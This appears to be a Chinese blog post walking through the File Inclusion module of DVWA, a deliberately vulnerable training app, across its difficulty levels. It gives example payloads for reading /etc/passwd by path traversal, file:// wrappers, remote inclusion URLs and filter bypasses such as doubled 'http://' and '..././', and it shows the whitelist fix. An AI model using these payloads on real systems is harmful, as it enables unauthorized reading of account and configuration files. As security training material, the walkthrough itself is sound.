Loading

DVWA(八):File Inclusion 全等级文件包含

文件包含:

  开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含。

文件包含漏洞:

  开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞。

所用到的函数:

 

require:找不到被包含的文件,报错,并且停止运行脚本。

 

include:找不到被包含的文件,只会报错,但会继续运行脚本。

 

require_once:与require类似,区别在于当重复调用同一文件时,程序只调用一次。

 

include_once:与include类似,区别在于当重复调用同一文件时,程序只调用一次。

 

主要特征:

?page=a.php
?home=b.html
?file=content

例如:

 

?file=../../../../etc/passwd
?page=file:///etc/passwd
?home=main.cgi
?page=http://www.a.com/1.php
http://1.1.1.1/../../../../dir/file.txt

举个例子:在DVWA的文件包含模块 low级别

这里有个1.txt文件,内容为  hello world

我们在URL中将参数修改为:?page=../1.txt,尝试包含这个1.txt文件:

 

 

 可以看到爆出了文件的内容。

这里路径可以用绝对路径也可以用相对路径;文件保护使,不管文件是何类型都会优先尝试当作

php文件执行,如果有php代码会返回php代码的结果,如果没有php代码,会将文件内容回显出来。

一般文件包含的隐患就是可以爆出passwd文件中的账户密码信息或者config配置文件的内容。

 

low级别:

观察源码:

可以看到low级别对于参数page没有进行任何的过滤

 

 

 用相对路径读取本地文件:

我们写一个php文件放在WWW目录下:

 

 

 

 

 

 尝试包含此文件:可以看到我们写的php代码被直接运行并返回结果

 

 

 也可以将参数构造为:

?page=http://目标IP/目标目录+目标文件 进行远程包含

 

Medium级别

观察源码:

这里使用了str_replace函数对http://  、 https:// 、 ../ 、  ..\   进行了过滤处理

可以使用双写http://或者绝对路径来绕过(例如:htthttp://p://)或者用..././来进行绕过

或者绝对路径和file协议。

 

 

 

High级别:

 

 

 两个条件分别为file变量中不含有file,且不等于include.php就行

还可以继续用file协议进行绕过

例如:

?page=file///C:/phpstudy/WWW/1.txt

 

 

 Impossible级别:

观察源码:

 

 

 可以看到只要不是 include.php file1.php file2.php file3.php 都会报错,类似于白名单的做法

除了以上四个文件其余的文件都不可被包含,彻底杜绝了文件包含漏洞。

 

posted @ 2020-03-23 16:39  Zh1z3ven  阅读(219)  评论(0编辑  收藏  举报